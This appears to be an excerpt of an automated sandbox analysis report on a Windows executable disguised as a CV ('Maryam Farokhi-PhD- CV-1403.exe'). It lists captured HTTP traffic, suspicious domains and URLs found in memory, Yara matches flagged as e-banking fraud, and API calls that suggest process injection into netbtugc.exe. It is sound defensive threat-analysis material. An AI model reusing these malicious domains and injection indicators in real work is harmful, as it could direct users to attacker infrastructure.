                    Content-Length: 0
                    Connection: close
                    X-Rate-Limit-Limit: 5s
                    X-Rate-Limit-Remaining: 19
                    X-Rate-Limit-Reset: 2024-11-11T16:04:47.7048831Z
                Source: global traffic HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 11 Nov 2024 16:05:24 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    x-ray: p529:0.000
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:05:57 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:06:00 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:06:03 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:06:06 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: netbtugc.exe, 00000004.00000002.33210230485.000000000504A000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.0000000003DCA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn
                Source: Maryam Farokhi-PhD- CV-1403.exeString found in binary or memory: http://tempuri.org/ds.xsd
                Source: ptzMmYcrKro.exe, 00000005.00000002.33208331721.00000000008CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wcp95.top
                Source: ptzMmYcrKro.exe, 00000005.00000002.33208331721.00000000008CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wcp95.top/nv0k/
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: netbtugc.exe, 00000004.00000002.33210230485.00000000043BA000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.000000000313A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.adm.tools/parking-page/style.css
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aU043Z43.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aU043Z43.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: netbtugc.exe, 00000004.00000002.33207890621.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: netbtugc.exe, 00000004.00000002.33207890621.0000000002E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: netbtugc.exe, 00000004.00000003.30250427352.0000000008002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: netbtugc.exe, 00000004.00000002.33210230485.00000000051DC000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.0000000003F5C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: netbtugc.exe, 00000004.00000002.33211442161.00000000065B0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33210230485.000000000454C000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.00000000032CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: aU043Z43.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: netbtugc.exe, 00000004.00000002.33210230485.00000000043BA000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.000000000313A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0042C6B3 NtClose,2_2_0042C6B3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82A80 NtClose,LdrInitializeThunk,2_2_00F82A80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00F82B90
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_00F82D10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F834E0 NtCreateMutant,LdrInitializeThunk,2_2_00F834E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F84260 NtSetContextThread,2_2_00F84260
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F84570 NtSuspendThread,2_2_00F84570
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F829F0 NtReadFile,2_2_00F829F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F829D0 NtWaitForSingleObject,2_2_00F829D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82AC0 NtEnumerateValueKey,2_2_00F82AC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82AA0 NtQueryInformationFile,2_2_00F82AA0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82A10 NtWriteFile,2_2_00F82A10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82BE0 NtQueryVirtualMemory,2_2_00F82BE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82BC0 NtQueryInformationToken,2_2_00F82BC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B80 NtCreateKey,2_2_00F82B80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B20 NtQueryInformationProcess,2_2_00F82B20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B10 NtAllocateVirtualMemory,2_2_00F82B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B00 NtQueryValueKey,2_2_00F82B00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82CF0 NtDelayExecution,2_2_00F82CF0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82CD0 NtEnumerateKey,2_2_00F82CD0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C50 NtUnmapViewOfSection,2_2_00F82C50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C30 NtMapViewOfSection,2_2_00F82C30
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C20 NtSetInformationFile,2_2_00F82C20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C10 NtOpenProcess,2_2_00F82C10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82DC0 NtAdjustPrivilegesToken,2_2_00F82DC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82DA0 NtReadVirtualMemory,2_2_00F82DA0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82D50 NtWriteVirtualMemory,2_2_00F82D50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82ED0 NtResumeThread,2_2_00F82ED0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82EC0 NtQuerySection,2_2_00F82EC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82EB0 NtProtectVirtualMemory,2_2_00F82EB0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82E80 NtCreateProcessEx,2_2_00F82E80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82E50 NtCreateSection,2_2_00F82E50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82E00 NtQueueApcThread,2_2_00F82E00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82FB0 NtSetValueKey,2_2_00F82FB0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82F30 NtOpenDirectoryObject,2_2_00F82F30
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82F00 NtCreateFile,2_2_00F82F00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F838D0 NtGetContextThread,2_2_00F838D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F83C90 NtOpenThread,2_2_00F83C90
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F83C30 NtOpenProcessToken,2_2_00F83C30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B4260 NtSetContextThread,LdrInitializeThunk,4_2_034B4260
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B4570 NtSuspendThread,LdrInitializeThunk,4_2_034B4570
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B00 NtQueryValueKey,LdrInitializeThunk,4_2_034B2B00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034B2B10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_034B2BC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B80 NtCreateKey,LdrInitializeThunk,4_2_034B2B80
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034B2B90
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2A10 NtWriteFile,LdrInitializeThunk,4_2_034B2A10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034B2AC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2A80 NtClose,LdrInitializeThunk,4_2_034B2A80
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B29F0 NtReadFile,LdrInitializeThunk,4_2_034B29F0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2F00 NtCreateFile,LdrInitializeThunk,4_2_034B2F00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2E50 NtCreateSection,LdrInitializeThunk,4_2_034B2E50
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2E00 NtQueueApcThread,LdrInitializeThunk,4_2_034B2E00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2ED0 NtResumeThread,LdrInitializeThunk,4_2_034B2ED0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_034B2D10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2DA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_034B2DA0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034B2C50
